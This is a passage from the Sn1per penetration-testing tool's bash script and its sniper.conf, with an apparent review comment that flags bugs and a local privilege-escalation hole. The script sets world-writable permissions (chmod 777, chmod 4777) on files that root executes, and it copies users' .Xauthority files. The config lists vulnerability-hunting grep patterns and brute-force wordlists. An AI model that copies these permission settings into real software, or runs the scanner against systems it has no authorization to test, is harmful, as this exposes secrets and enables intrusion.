echo "You need to set a workspace via the -w switch to export a workspace."
exit
fi
echo "Archiving $WORKSPACE to $INSTALL_DIR/loot/$WORKSPACE.tar"
cd $INSTALL_DIR/loot/workspace/ && tar -cvf ../$WORKSPACE.tar $WORKSPACE
cp -Rf $WORKSPACE ${WORKSPACE}_`date +"%Y-%m-%d"`
echo "Done!"
exit
shift
;;
-s|--status)
sniper_status
exit
shift
;;
-u|--update)
UPDATE="1"
update
exit
shift # past argument
;;
*) # unknown option
POSITIONAL+=("$1") # save it in an array for later
echo "Unknown scan option $POSITIONAL...refer to the help menu for usage details."
exit
shift # past argument
;;
esac
done
set -- "${POSITIONAL[@]}" # restore positional parameters
if [[ ! -z "$TARGET" ]] && [[ -z "$WORKSPACE" ]]; then
WORKSPACE=$(echo "$TARGET")
fi
if [[ -z "$TARGET" ]] && [[ -z "$WORKSPACE" ]]; then
logo
echo "You need to specify a target or workspace to use. Type sniper --help for command usage."
exit
fi
cd $INSTALL_DIR
function init {
if [[ ! -z $WORKSPACE_DIR ]]; then
LOOT_DIR=$WORKSPACE_DIR
fi
echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR $OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
mkdir -p $LOOT_DIR 2> /dev/nul
mkdir $LOOT_DIR/domains 2> /dev/null
mkdir $LOOT_DIR/ips 2> /dev/null
mkdir $LOOT_DIR/screenshots 2> /dev/null
mkdir $LOOT_DIR/nmap 2> /dev/null
mkdir $LOOT_DIR/reports 2> /dev/null
mkdir $LOOT_DIR/output 2> /dev/null
mkdir $LOOT_DIR/osint 2> /dev/null
mkdir $LOOT_DIR/credentials 2> /dev/null
mkdir $LOOT_DIR/web 2> /dev/null
mkdir $LOOT_DIR/vulnerabilities 2> /dev/null
mkdir $LOOT_DIR/notes 2> /dev/null
mkdir -p $LOOT_DIR/scans/scheduled/ 2> /dev/null
touch $LOOT_DIR/scans/scheduled/daily.sh 2> /dev/null
touch $LOOT_DIR/scans/scheduled/weekly.sh 2> /dev/null
touch $LOOT_DIR/scans/scheduled/monthly.sh 2> /dev/null
touch $LOOT_DIR/scans/notifications.txt 2> /dev/null
touch $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
chmod 777 -Rf $INSTALL_DIR 2> /dev/null
chown root $INSTALL_DIR/sniper 2> /dev/null
chmod 4777 $INSTALL_DIR/sniper 2> /dev/null
TARGET="$(echo $TARGET | sed 's/https:\/\///g' | sed 's/http:\/\///g')"
rm -f /tmp/out_of_scope 2> /dev/null
for key in "${OUT_OF_SCOPE[@]}"; do echo $TARGET | egrep ${key} >> /tmp/out_of_scope 2> /dev/null; done;
OUT_OF_SCOPE_NUM=$(wc -l /tmp/out_of_scope 2> /dev/null | awk '{print $1}' 2> /dev/null)
if [[ $OUT_OF_SCOPE_NUM > 0 ]]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE] $TARGET is out of scope. Skipping! $RESET"
exit
else
echo -e "$OKBLUE[*]$RESET Scanning $TARGET $OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt 2> /dev/null
fi
service postgresql start 2> /dev/null > /dev/null
msfdb start 2> /dev/null > /dev/null
chown root /run/user/1000/gdm/Xauthority 2> /dev/null
LAST_USER=$(last | head -n 1 | awk '{print $1}')
sudo cp -a /home/$LAST_USER/.Xauthority /root/.Xauthority 2> /dev/null
sudo cp -a /root/.Xauthority /root/.Xauthority.bak 2> /dev/null
sudo cp -a /home/$USER/.Xauthority /root/.Xauthority 2> /dev/null
sudo cp -a /home/kali/.Xauthority /root/.Xauthority 2> /dev/null
sudo chown root: /root/.Xauthority 2> /dev/null
XAUTHORITY=/root/.Xauthority
UPDATED_TARGETS=$LOOT_DIR/scans/updated.txt
if [[ "$AUTO_BRUTE" == "1" ]]; then
echo "$TARGET AUTO_BRUTE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt
touch $LOOT_DIR/scans/$TARGET-AUTO_BRUTE.txt 2> /dev/null
fi
if [[ "$FULLNMAPSCAN" == "1" ]]; then
echo "$TARGET fullnmapscan `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt
touch $LOOT_DIR/scans/$TARGET-fullnmapscan.txt 2> /dev/null
fi
if [[ "$OSINT" == "1" ]]; then
echo "$TARGET osint `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt
touch $LOOT_DIR/scans/$TARGET-osint.txt 2> /dev/null
fi
if [[ "$RECON" == "1" ]]; then
echo "$TARGET recon `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt
touch $LOOT_DIR/scans/$TARGET-recon.txt 2> /dev/null
fi
}
function loot {
if [[ ! $LOOT == "0" ]]; then
echo -e "$OKRED ____ $RESET"
echo -e "$OKRED _________ / _/___ ___ _____$RESET"
echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo ""
if [[ ! -z $WORKSPACE_DIR ]]; then
LOOT_DIR=$WORKSPACE_DIR
fi
rm -f $INSTALL_DIR/stash.sqlite 2> /dev/null
rm -f $INSTALL_DIR/hydra.restore 2> /dev/null
rm -f /tmp/update-check.txt 2> /dev/null
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt 2> /dev/null
echo -e "$OKBLUE[*]$RESET Opening loot directory $LOOT_DIR $OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
cd $LOOT_DIR
if [[ "$METASPLOIT_IMPORT" == "1" ]]; then
echo -e "$OKORANGE + -- --=[ Starting Metasploit service...$RESET"
/etc/init.d/metasploit start 2> /dev/null > /dev/null
msfdb start
echo -e "$OKORANGE + -- --=[ Importing NMap XML files into Metasploit...$RESET"
msfconsole -x "workspace -a $WORKSPACE; workspace $WORKSPACE; db_import $LOOT_DIR/nmap/nmap*.xml; hosts; services; exit;" | tee $LOOT_DIR/notes/msf-$WORKSPACE.txt
fi
echo -e "$OKORANGE + -- --=[ Generating reports...$RESET"
cd $LOOT_DIR/output 2> /dev/null
echo -en "$OKGREEN[$OKBLUE"
for a in `ls sniper-*.txt 2>/dev/null`;
do
echo "$a" 2> /dev/null | aha 2> /dev/null > $LOOT_DIR/reports/$a.html 2> /dev/null
cat "$a" 2> /dev/null | aha 2> /dev/null >> $LOOT_DIR/reports/$a.html 2> /dev/null
echo -n '|'
done
echo -en "$OKGREEN]$RESET"
echo ""
cd ..
chmod 777 -Rf $LOOT_DIR
echo -e "$OKORANGE + -- --=[ Sorting all files...$RESET"
cat $LOOT_DIR/scans/notifications_new.txt 2> /dev/null >> $LOOT_DIR/scans/notifications.txt 2> /dev/null
sort -u $LOOT_DIR/domains/*-full.txt 2> /dev/null > $LOOT_DIR/domains/domains-all-presorted.txt 2> /dev/null
sed -E "s/^\.//g" $LOOT_DIR/domains/domains-all-presorted.txt 2> /dev/null | sed -E "s/^\*\.//g" | tr '[:upper:]' '[:lower:]' | sort -u > $LOOT_DIR/domains/domains-all-presorted2.txt 2> /dev/null
sort -u $LOOT_DIR/domains/targets.txt 2> /dev/null > $LOOT_DIR/domains/targets-all-presorted.txt 2> /dev/null
sed -E "s/^\.//g" $LOOT_DIR/domains/targets-all-presorted.txt 2> /dev/null | sed -E "s/^\*\.//g" | tr '[:upper:]' '[:lower:]' | sort -u > $LOOT_DIR/domains/targets-all-sorted.txt 2> /dev/null
sort -u $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null > $LOOT_DIR/ips/ips-all-sorted.txt 2> /dev/null
sed -i -E 's/address//g' $LOOT_DIR/ips/ips-all-sorted.txt 2> /dev/null
sort -u $LOOT_DIR/domains/domains-all-presorted2.txt $LOOT_DIR/domains/targets-all-sorted.txt 2> /dev/null > $LOOT_DIR/domains/domains-all-sorted.txt 2> /dev/null
diff $LOOT_DIR/domains/targets-all-sorted.txt $LOOT_DIR/domains/domains-all-sorted.txt 2> /dev/null | grep \> | awk '{print $2}' > $LOOT_DIR/domains/targets-all-unscanned.txt
rm -f $LOOT_DIR/domains/targets-all-presorted.txt $LOOT_DIR/domains/targets-all-presorted2.txt 2> /dev/null
rm -f $LOOT_DIR/domains/domains-all-presorted.txt $LOOT_DIR/domains/domains-all-presorted2.txt 2> /dev/null
sort -u $LOOT_DIR/nmap/openports-unsorted.txt 2> /dev/null > $LOOT_DIR/nmap/openports-sorted.txt 2> /dev/null
sort -u $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null > $LOOT_DIR/nmap/livehosts-sorted.txt 2> /dev/null
find $LOOT_DIR/web/ -type f -size -1c -exec rm -f {} \;
cd $LOOT_DIR/web/ && rm -f webhosts-all-sorted-* 2> /dev/null
cd $LOOT_DIR/domains/ && rm -f domains-all-sorted-* 2> /dev/null
cd $LOOT_DIR/nmap/ && rm -f openports-all-sorted-* 2> /dev/null
cd $LOOT_DIR/nmap/ && rm -f livehosts-all-sorted-* 2> /dev/null
cd $LOOT_DIR/web/ 2> /dev/null
egrep -Hi 'HTTP/1.' headers-* 2> /dev/null | cut -d':' -f1 | sed "s/headers\-http\(\|s\)\-//g" | sed "s/\.txt//g" | cut -d \- -f1 | sort -u 2> /dev/null > $LOOT_DIR/web/webhosts-sorted.txt 2> /dev/null
split -d -l $MAX_HOSTS -e $LOOT_DIR/web/webhosts-sorted.txt webhosts-all-sorted- 2> /dev/null
cd $LOOT_DIR/domains/ 2> /dev/null
split -d -l $MAX_HOSTS -e $LOOT_DIR/domains/domains-all-sorted.txt domains-all-sorted- 2> /dev/null
cd $LOOT_DIR/nmap/ 2> /dev/null
split -d -l $MAX_HOSTS -e $LOOT_DIR/nmap/openports-sorted.txt openports-all-sorted- 2> /dev/null
split -d -l $MAX_HOSTS -e $LOOT_DIR/nmap/livehosts-sorted.txt livehosts-all-sorted- 2> /dev/null
echo -e "$OKORANGE + -- --=[ Removing blank screenshots and files...$RESET"
chmod 777 -Rf $LOOT_DIR 2> /dev/null
cd $LOOT_DIR/screenshots/
find $LOOT_DIR/screenshots/ -type f -size -9000c -exec rm -f {} \;
find $LOOT_DIR/nmap/ -type f -size -1c -exec rm -f {} \;
find $LOOT_DIR/ips/ -type f -size -1c -exec rm -f {} \;
find $LOOT_DIR/osint/ -type f -size -1c -exec rm -f {} \;
find $LOOT_DIR/vulnerabilities/ -type f -size -1c -exec rm -f {} \;
cd $LOOT_DIR
if [[ -f $SNIPER_PRO ]]; then
wc -l $LOOT_DIR/scans/notifications.txt 2> /dev/null | awk '{print $1}' > $LOOT_DIR/scans/notifications_total.txt 2> /dev/null
wc -l $LOOT_DIR/scans/notifications_new.txt 2> /dev/null | awk '{print $1}' > $LOOT_DIR/scans/notifications_new_total.txt 2> /dev/null
cat $LOOT_DIR/scans/tasks-running.txt 2> /dev/null > $LOOT_DIR/scans/tasks-running_total.txt 2> /dev/null
wc -l $LOOT_DIR/scans/tasks.txt 2> /dev/null | awk '{print $1}' 2> /dev/null > $LOOT_DIR/scans/tasks_total.txt 2> /dev/null
wc -l $LOOT_DIR/scans/scheduled/*.sh 2> /dev/null | awk '{print $1}' 2> /dev/null > $LOOT_DIR/scans/scheduled_tasks_total.txt 2> /dev/null
grep "Host\ status" $LOOT_DIR/scans/notifications.txt 2> /dev/null | wc -l | awk '{print $1}' 2> /dev/null > $LOOT_DIR/scans/host_status_changes_total.txt 2> /dev/null
grep "Port\ change" $LOOT_DIR/scans/notifications.txt 2> /dev/null | wc -l | awk '{print $1}' 2> /dev/null > $LOOT_DIR/scans/port_changes_total.txt 2> /dev/null
wc -l $LOOT_DIR/domains/domains_new-*.txt 2> /dev/null | awk '{print $1}' 2> /dev/null > $LOOT_DIR/scans/domain_changes_total.txt 2> /dev/null
cat $LOOT_DIR/web/dirsearch-new-*.txt $LOOT_DIR/web/spider-new-*.txt 2> /dev/null | wc -l | awk '{print $1}' 2> /dev/null > $LOOT_DIR/scans/url_changes_total.txt 2> /dev/null
if [[ -f "$LOOT_DIR/notes/notepad.html" ]]; then
echo -n "" 2>/dev/null
else
cp "$INSTALL_DIR/pro/notepad.html" "$LOOT_DIR/notes/notepad.html" 2>/dev/null
PRE_NAME=$(echo $WORKSPACE | sed "s/\./-/g")
sed -i "s/notepad/notepad-$PRE_NAME/g" "$LOOT_DIR/notes/notepad.html" 2> /dev/null
fi
if [[ "$SN1PER_AUTOLOAD" = "1" ]] && [[ ! -f "$INSTALL_DIR/pro/settings.php" ]]; then
echo -e "$OKORANGE + -- --=[ Loading Sn1per Professional...$RESET"
source $INSTALL_DIR/pro.sh
sudo $LAST_USER -c $BROWSER $LOOT_DIR/sniper-report.html 2> /dev/null > /dev/null &
else
echo -e "$OKORANGE + -- --=[ Generating Sn1per Professional reports...$RESET"
source $INSTALL_DIR/pro.sh
fi
else
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$RESET ⚡ Upgrade to Sn1per Professional and unlock a world of powerful benefits! 🚀 $RESET"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$RESET $RESET"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$RESET 💡 Don't miss out on important updates by using the Community version. $RESET"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$RESET $RESET"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$RESET 🔝 The latest Professional version ( ${OKRED}10.8 ${RESET}) offers unparalleled features, including: $RESET"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$RESET $RESET"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$RESET 💻 Sleek Web UI $RESET"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$RESET 🛠️ Extensive add-ons $RESET"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$RESET 🔄 Seamless integrations $RESET"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$RESET $RESET"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$RESET 🤝 Experience priority support, continuous updates, and enhanced capabilities tailored for professionals like you. $RESET"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$RESET $RESET"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$RESET 💰 Maximize your investment and achieve exceptional results with Sn1per Professional. $RESET"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$RESET $RESET"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$RESET 🔍 Learn more about the differences between the versions at: ${OKBLUE}https://sn1persecurity.com/wordpress/sn1per-community-vs-professional-whats-the-difference/ $RESET"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$RESET $RESET"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$RESET 🛒 Purchase your Sn1per Professional license now at: ${OKBLUE}https://sn1persecurity.com/ $RESET"
sudo $LAST_USER -c $BROWSER https://sn1persecurity.com 2> /dev/null > /dev/null &
fi
rm -f $UPDATED_TARGETS 2> /dev/null
touch $UPDATED_TARGETS 2> /dev/null
echo -e "$OKORANGE + -- --=[ Done!$RESET"
fi
}
if [[ "$REIMPORT" = "1" ]]; then
if [[ ! -z "$WORKSPACE_DIR" ]]; then
LOOT="1"
loot
exit
fi
fi
if [[ "$REIMPORT_ALL" = "1" ]]; then
if [[ ! -z "$WORKSPACE_DIR" ]]; then
touch $WORKSPACE_DIR/domains/targets.txt $WORKSPACE_DIR/domains/targets-all-sorted.txt $WORKSPACE_DIR/domains/domains-all-sorted.txt
cat $WORKSPACE_DIR/domains/targets.txt $WORKSPACE_DIR/domains/targets-all-sorted.txt $WORKSPACE_DIR/domains/domains-all-sorted.txt | sort -u > $WORKSPACE_DIR/scans/updated.txt
rm -f $WORKSPACE_DIR/nmap/openports-unsorted.txt 2> /dev/null
rm -f $WORKSPACE_DIR/nmap/openports-sorted.txt 2> /dev/null
rm -f $WORKSPACE_DIR/reports/host-table-report.csv 2> /dev/null
LOOT="1"
loot
exit
fi
fi
if [[ "$RELOAD" = "1" ]]; then
if [[ ! -z "$WORKSPACE_DIR" ]]; then
$BROWSER $WORKSPACE_DIR/sniper-report.html 2> /dev/null > /dev/null &
exit
fi
fi
if [[ ${TARGET:0:1} =~ $REGEX ]];
then
SCAN_TYPE="IP"
else
SCAN_TYPE="DOMAIN"
fi
# INITILIZE
init
if [[ ! -f /tmp/update-check.txt ]]; then
# CHECK CONNECTION STATUS
check_online
fi
if [[ ! -f /tmp/update-check.txt ]]; then
# CHECK FOR UPDATES
check_update
fi
# CHECK FOR BLACKARCH LINUX
if grep -q BlackArch /etc/issue; then
DISTRO='blackarch'
echo "Detected BlackArch GNU/Linux"
INSTALL_DIR=$(pwd)
echo "Setting current path to $INSTALL_DIR"
fi
source modes/discover.sh
source modes/flyover.sh
source modes/vulnscan.sh
source modes/fullportonly.sh
source modes/web.sh
source modes/webporthttp.sh
source modes/webporthttps.sh
source modes/webscan.sh
source modes/massweb.sh
source modes/masswebscan.sh
source modes/massvulnscan.sh
source modes/massportscan.sh
source modes/stealth.sh
source modes/airstrike.sh
source modes/nuke.sh
source modes/normal.sh
rm -f /tmp/update-check.txt 2> /dev/null
exit 0
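Review bot: `-s` is bound twice in this `case` (`-s|--schedule` first, `-s|--status` later), so the status branch is unreachable and `sniper_status` can only be reached via `--status`; give status its own short flag. Several branches carry real logic defects as well. In `-dt|--delete-task`, `rm -vf $WORKSPACE_DIR/scans/running_$TARGET_*.txt` expands the undefined variable `TARGET_` (underscore is a name character), so the glob becomes `running_*.txt` and every running-task marker in the workspace is deleted; it needs `${TARGET}_`. The following `ps -ef | egrep "sniper" | ... xargs -i sudo kill -9 {}` kills every process whose command line contains "sniper", including the invoking shell and unrelated scans. `-d|--delete` has no empty-`$WORKSPACE` guard like `-s` and `--export` do, so `rm -Rf /usr/share/sniper/loot/workspace/$WORKSPACE/` with no workspace set wipes the whole workspace tree; it also hardcodes the path instead of using `$INSTALL_DIR`. In `init`, `mkdir -p $LOOT_DIR 2> /dev/nul` is a typo that creates a regular file named /dev/nul when run as root; `[[ $OUT_OF_SCOPE_NUM > 0 ]]` is a lexicographic string comparison and should be `-gt`; `egrep ${key}` feeds `OUT_OF_SCOPE` entries in as unescaped regexes; and `sudo $LAST_USER -c $BROWSER ...` (twice in `loot`) is missing `-u`, so sudo tries to execute a command named after the user. Most importantly, `chmod 777 -Rf $INSTALL_DIR` followed by `chmod 4777 $INSTALL_DIR/sniper` makes the entire install tree, including sniper.conf with its API keys and scanner passwords, readable and writable by every local account, and leaves a world-writable file that root later executes, which is a straightforward local privilege escalation (the setuid bit itself is ignored by Linux on interpreter scripts, so it buys nothing). Restrict to 0755/0750 with root ownership and keep secrets in a 0600 file. The `shift` after each `exit` is dead code and can go; the BlackArch block also reassigns `INSTALL_DIR` after `init` has already used the old value.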

251
sniper.conf Normal file

@@ -0,0 +1,251 @@
INSTALL_DIR="/usr/share/sniper"
SNIPER_PRO=$INSTALL_DIR/pro.sh
PLUGINS_DIR="$INSTALL_DIR/plugins"
# COLORS
OKBLUE='\033[94m'
OKRED='\033[91m'
OKGREEN='\033[92m'
OKORANGE='\033[93m'
RESET='\e[0m'
REGEX='^[0-9]+$'
# AUX MODE OVERRIDE
# AUTO_BRUTE="0"
# FULLNMAPSCAN="0"
# OSINT="0"
VULNSCAN="0"
# DEFAULT SETTINGS
ENABLE_AUTO_UPDATES="1"
REPORT="1"
LOOT="1"
# OUT OF SCOPE
OUT_OF_SCOPE=("www.sn1persecurity.com" "sn1persecurity.com" "*.sn1persecurity.com")
# SN1PER PROFESSIONAL SETTINGS
SNIPER_PRO_CONSOLE_OUTPUT="0"
SN1PER_AUTOLOAD="0"
MAX_HOSTS="2000"
# DEFAULT BROWSER
BROWSER="firefox"
# BURP 2.0 SCANNER CONFIG
BURP_HOST="127.0.0.1"
BURP_PORT="1338"
# OPENVAS CONFIG
OPENVAS="0"
OPENVAS_HOST="127.0.0.1"
OPENVAS_PORT="9390"
OPENVAS_USERNAME="admin"
OPENVAS_PASSWORD=""
OPENVAS_RUNAS_USER="kali"
# NESSUS CONFIG
NESSUS="0"
NESSUS_HOST="127.0.0.1:8834"
NESSUS_USERNAME="admin"
NESSUS_PASSWORD=""
NESSUS_POLICY_ID="c3cbcd46-329f-a9ed-1077-554f8c2af33d0d44f09d736969bf"
# METASPLOIT SCANNER CONFIG
METASPLOIT_IMPORT="0"
MSF_LHOST="127.0.0.1"
MSF_LPORT="4444"
# SHODAN API KEY
SHODAN_API_KEY=""
# CENSYS API KEYS
CENSYS_APP_ID=""
CENSYS_API_SECRET=""
# HUNTER.IO API KEY
HUNTERIO_KEY=""
# TOMBA.IO API
TOMBAIO_KEY=""
TOMBAIO_SECRET=""
# GITHUB API KEY
GITHUB_API_KEY=""
# WPSCAN API KEY
WP_API_KEY=""
# SLACK API
SLACK_NOTIFICATIONS="0"
SLACK_NOTIFICATIONS_THEHARVESTER="0"
SLACK_NOTIFICATIONS_EMAIL_SECURITY="0"
SLACK_NOTIFICATIONS_DOMAINS_NEW="0"
SLACK_NOTIFICATIONS_TAKEOVERS_NEW="0"
SLACK_NOTIFICATIONS_SUBOVER_NEW="0"
SLACK_NOTIFICATIONS_SUBJACK_NEW="0"
SLACK_NOTIFICATIONS_S3_BUCKETS="0"
SLACK_NOTIFICATIONS_SUBNETS="0"
SLACK_NOTIFICATIONS_DIRSEARCH_NEW="0"
SLACK_NOTIFICATIONS_SPIDER_NEW="0"
SLACK_NOTIFICATIONS_WHATWEB="0"
SLACK_NOTIFICATIONS_NMAP="0"
SLACK_NOTIFICATIONS_NMAP_DIFF="0"
SLACK_NOTIFICATIONS_BRUTEFORCE="0"
SLACK_NOTIFICATIONS_WHOIS="0"
SLACK_NOTIFICATIONS_METAGOOFIL="0"
SLACK_NOTIFICATIONS_ARACHNI_SCAN="0"
SLACK_NOTIFICATIONS_EMAIL_FORMAT="0"
# ACTIVE WEB BRUTE FORCE STAGES
WEB_BRUTE_STEALTHSCAN="1"
WEB_BRUTE_COMMONSCAN="1"
WEB_BRUTE_FULLSCAN="0"
WEB_BRUTE_EXPLOITSCAN="0"
WEB_JAVASCRIPT_ANALYSIS="1"
MAX_JAVASCRIPT_FILES="25"
# WEB BRUTE FORCE WORDLISTS
WEB_BRUTE_STEALTH="$INSTALL_DIR/wordlists/web-brute-stealth.txt"
WEB_BRUTE_COMMON="$INSTALL_DIR/wordlists/web-brute-common.txt"
WEB_BRUTE_FULL="$INSTALL_DIR/wordlists/web-brute-full.txt"
WEB_BRUTE_EXPLOITS="$INSTALL_DIR/wordlists/web-brute-exploits.txt"
WEB_BRUTE_EXTENSIONS="htm,html,asp,aspx,php,jsp,js"
WEB_BRUTE_EXCLUDE_CODES="400,403,404,405,406,429,500,502,503,504"
# GREP PATTERNS
STATIC_GREP_SEARCH="1"
GREP_MAX_LINES="10"
GREP_INTERESTING_SUBDOMAINS="admin|jenkins|test|proxy|stage|test|dev|devops|staff|db|qa|internal"
GREP_EXTENSIONS="\.action|\.adr|\.ascx|\.asmx|\.axd|\.backup|\.bak|\.bkf|\.bkp|\.bok|\.achee|\.cfg|\.cfm|\.cgi|\.cnf|\.conf|\.config|\.crt|\.csr|\.csv|\.dat|\.doc|\.docx|\.eml|\.env|\.exe|\.gz|\.ica|\.inf|\.ini|\.java|\.json|\.key|\.log|\.lst|\.mai|\.mbox|\.mbx|\.md|\.mdb|\.nsf|\.old|\.ora|\.pac|\.passwd|\.pcf|\.pdf|\.pem|\.pgp|\.pl| plist|\.pwd|\.rdp|\.reg|\.rtf|\.skr|\.sql|\.swf|\.tpl|\.txt|\.url|\.wml|\.xls|\.xlsx|\.xml|\.xsd|\.yml"
GREP_PARAMETERS="template=|preview=|id=|view=|activity=|name=|content=|redirect=|(&|[?])access(&|=)|(&|[?])admin(&|=)|(&|[?])dbg(&|=)|(&|[?])debug(&|=)|(&|[?])edit(&|=)|(&|[?])grant(&|=)|(&|[?])test(&|=)|(&|[?])alter(&|=)|(&|[?])clone(&|=)|(&|[?])create(&|=)|(&|[?])delete(&|=)|(&|[?])disable(&|=)|(&|[?])enable(&|=)|(&|[?])exec(&|=)|(&|[?])execute(&|=)|(&|[?])load(&|=)|(&|[?])make(&|=)|(&|[?])modify(&|=)|(&|[?])rename(&|=)|(&|[?])reset(&|=)|(&|[?])shell(&|=)|(&|[?])toggle(&|=)|(&|[?])adm(&|=)|(&|[?])root(&|=)|(&|[?])cfg(&|=)|(&|[?])dest(&|=)|(&|[?])redirect(&|=)|(&|[?])uri(&|=)|(&|[?])path(&|=)|(&|[?])continue(&|=)|(&|[?])url(&|=)|(&|[?])window(&|=)|(&|[?])next(&|=)|(&|[?])data(&|=)|(&|[?])reference(&|=)|(&|[?])site(&|=)|(&|[?])html(&|=)|(&|[?])val(&|=)|(&|[?])validate(&|=)|(&|[?])domain(&|=)|(&|[?])callback(&|=)|(&|[?])return(&|=)|(&|[?])feed(&|=)|(&|[?])host(&|=)|(&|[?])port(&|=)|(&|[?])to(&|=)|(&|[?])out(&|=)|(&|[?])view(&|=)|(&|[?])dir(&|=)|(&|[?])show(&|=)|(&|[?])navigation(&|=)|(&|[?])open(&|=)|(&|[?])file(&|=)|(&|[?])document(&|=)|(&|[?])folder(&|=)|(&|[?])pg(&|=)|(&|[?])php_path(&|=)|(&|[?])style(&|=)|(&|[?])doc(&|=)|(&|[?])img(&|=)|(&|[?])filename(&|=)|id=|select=|report=|role=|update=|query=|user=|name=|sort=|where=|search=|params=|process=|row=|view=|table=|from=|sel=|results=|sleep=|fetch=|order=|keyword=|column=|field=|delete=|string=|number=|filter=|(&|[?])callback=|(&|[?])cgi-bin/redirect.cgi|(&|[?])checkout=|(&|[?])checkout_url=|(&|[?])continue=|(&|[?])data=|(&|[?])dest=|(&|[?])destination=|(&|[?])dir=|(&|[?])domain=|(&|[?])feed=|(&|[?])file=|(&|[?])file_name=|(&|[?])file_url=|(&|[?])folder=|(&|[?])folder_url=|(&|[?])forward=|(&|[?])from_url=|(&|[?])go=|(&|[?])goto=|(&|[?])host=|(&|[?])html=|(&|[?])image_url=|(&|[?])img_url=|(&|[?])load_file=|(&|[?])load_url=|(&|[?])login_url=|(&|[?])logout=|(&|[?])navigation=|(&|[?])next=|(&|[?])next_page=|(&|[?])Open=|(&|[?])out=|(&|[?])page_url=|(&|[?])path=|(&|[?])port=|(&|[?])redir=|(&|[?])redirect=|(&|[?])redire
ct_to=|(&|[?])redirect_uri=|(&|[?])redirect_url=|(&|[?])reference=|(&|[?])return=|(&|[?])return_path=|(&|[?])return_to=|(&|[?])returnTo=|(&|[?])return_url=|(&|[?])rt=|(&|[?])rurl=|(&|[?])show=|(&|[?])site=|(&|[?])target=|(&|[?])to=|(&|[?])uri=|(&|[?])url=|(&|[?])val=|(&|[?])validate=|(&|[?])view=|(&|[?])window=|daemon=|upload=|dir=|execute=|download=|log=|ip=|cli=|cmd=|file=|document=|folder=|root=|path=|pg=|style=|pdf=|template=|php_path=|doc=|page=|name=|id=|user=|account=|number=|order=|no=|doc=|key=|email=|group=|profile=|edit=|report=|access=|admin=|dbg=|debug=|edit=|grant=|test=|alter=|clone=|create=|delete=|disable=|enable=|exec=|execute=|load=|make=|modify=|rename=|reset=|shell=|toggle=|adm=|root=|cfg=|config="
GREP_XSS="q=|s=|search=|lang=|keyword=|query=|page=|keywords=|year=|view=|email=|type=|name=|p=|callback=|jsonp=|api_key=|api=|password=|email=|emailto=|token=|username=|csrf_token=|unsubscribe_token=|id=|item=|page_id=|month=|immagine=|list_type=|url=|terms=|categoryid=|key=|l=|begindate=|enddate="
GREP_SSRF="access|admin|dbg|debug|edit|grant|test|alter|clone|create|delete|disable|enable|exec|execute|load|make|modify|rename|reset|shell|toggle|adm|root|cfg|dest|redirect|uri|path|continue|url|window|next|data|reference|site|html|val|validate|domain|callback|return|page|feed|host|port|to|out|view|dir|show|navigation|open"
GREP_REDIRECT="forward=|dest=|redirect=|uri=|path=|continue=|url=|window=|to=|out=|view=|dir=|show=|navigation=|Open=|file=|val=|validate=|domain=|callback=|return=|page=|feed=|host=|port=|next=|data=|reference=|site=|html="
GREP_RCE="daemon|upload|dir|execute|download|log|ip|cli|cmd"
GREP_IDOR="id|user|account|number|order|no|doc|key|email|group|profile|edit|report"
GREP_SQL="id|select|report|role|update|query|user|name|sort|where|search|params|process|row|view|table|from|sel|results|sleep|fetch|order|keyword|column|field|delete|string|number|filter"
GREP_LFI="file|document|folder|root|path|pg|style|pdf|template|php_path|doc"
GREP_SSTI="template|preview|id|view|activity|name|content|redirect"
GREP_DEBUG="access|admin|dbg|debug|edit|grant|test|alter|clone|create|delete|disable|enable|exec|execute|load|make|modify|rename|reset|shell|toggle|adm|root|cfg|config"
# DOMAIN WORDLISTS
DOMAINS_QUICK="$INSTALL_DIR/wordlists/domains-quick.txt"
DOMAINS_DEFAULT="$INSTALL_DIR/wordlists/domains-default.txt"
# DOMAINS_FULL="$INSTALL_DIR/wordlists/domains-all.txt"
# DEFAULT USER/PASS WORDLISTS
USER_FILE="/usr/share/brutex/wordlists/simple-users.txt"
PASS_FILE="/usr/share/brutex/wordlists/password.lst"
